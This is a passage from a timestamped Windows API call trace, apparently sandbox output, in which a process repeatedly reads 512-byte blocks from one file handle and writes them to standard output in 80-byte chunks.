(hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, 
lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.232] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.232] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 
[0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.233] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.233] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.234] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.234] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, 
lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 
| out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.235] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.235] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 
[0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.236] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.237] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 
[0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.238] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.238] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, 
lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.239] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.239] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType 
(hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.240] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 